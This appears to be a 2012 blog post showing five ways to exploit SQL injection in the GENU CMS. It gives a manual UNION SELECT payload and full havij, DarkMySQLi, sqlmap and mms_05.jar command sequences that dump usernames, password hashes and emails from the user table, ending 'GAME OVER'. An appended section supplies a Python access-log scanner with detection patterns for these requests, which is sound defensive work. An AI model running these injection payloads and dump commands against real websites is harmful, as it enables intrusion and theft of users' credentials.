Monday, 9 April 2012

Advanced SQL injection (5 ways to take control of a website)

havij | manual | mms_05.jar | DarkMySQLi | sqlmap
The vulnerable CMS can be downloaded from here:
http://www.exploit-db.com/exploits/18708/
1. havij
download
http://itsecteam.com/en/projects/project1_page2.htm
2. manual
http://192.168.1.102/GENU-2012.3/articles/read.php?article_id=null union select 1,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5 from genu_users--
3. mms_05.jar
download
http://www.scrt.ch/en/attack/downloads/mini-mysqlat0r
java -jar mms_05.jar
http://192.168.1.104/GENU-2012.3/
4. DarkMySQLi
cd /pentest/web/darkmysqli
python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" --findcol

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" --dbs

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" --full

python DarkMySQLi.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de--" -D baza -T genu_users -C user_name,user_password --dump

5. sqlmap
cd /pentest/database/sqlmap/
python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" --dbs

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza --tables

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza -T genu_users --columns

python sqlmap.py -u "http://192.168.1.104/GENU-2012.3/articles/read.php?article_id=1" -D baza -T genu_users -C user_email,user_name,user_password --dump

GAME OVER
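
From the defender's side, every request above leaves the same trace in the web server's access log: an article_id value that is not a plain integer. The following is an added example (not part of the original post and not code from any of the tools) that scans access-log lines for that parameter and labels the patterns seen in the requests above. It assumes the common/combined log format and that a legitimate article_id is always an integer; the log lines and client addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Patterns lifted from the requests shown in this post.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "always_false": re.compile(r"\band\s+1\s*=\s*2\b", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
    "sql_comment": re.compile(r"--\s*$"),
    "darkmysqli_marker": re.compile(r"darkc0de", re.I),
}
# Common/combined log format: client IP first, request line in quotes.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+"')


def inspect_line(line, param="article_id"):
    """Return (client_ip, [reasons]) if `param` is not a plain integer, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # parse_qs undoes %20 and '+' encoding, so both request styles normalise.
    query = urlsplit(m["target"]).query
    values = parse_qs(query, keep_blank_values=True).get(param, [])
    reasons = []
    for value in values:
        if re.fullmatch(r"[0-9]+", value):
            continue  # assumption: a legitimate article_id is always an integer
        reasons.append("non_numeric")
        reasons += [name for name, rx in SIGNATURES.items() if rx.search(value)]
    return (m["ip"], reasons) if reasons else None


def scan(lines):
    """Inspect every log line and keep only the flagged ones."""
    return [hit for hit in map(inspect_line, lines) if hit]


# Constructed sample log; client addresses are from documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Apr/2012:10:00:01 +0200] "GET /GENU-2012.3/articles/read.php?article_id=7 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [09/Apr/2012:10:02:11 +0200] "GET /GENU-2012.3/articles/read.php?article_id=null%20union%20select%201,concat(user_name,0x3a,0x3a,0x3a,user_password),3,4,5%20from%20genu_users-- HTTP/1.1" 200 4312',
    '203.0.113.5 - - [09/Apr/2012:10:03:40 +0200] "GET /GENU-2012.3/articles/read.php?article_id=1+AND+1=2+UNION+SELECT+1,darkc0de,darkc0de,darkc0de,darkc0de-- HTTP/1.1" 200 4290',
]

if __name__ == "__main__":
    for ip, reasons in scan(SAMPLE_LOG):
        print(ip, ",".join(reasons))
```

The "non_numeric" reason alone is the reliable signal; the named signatures only help triage which technique or tool produced the request.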
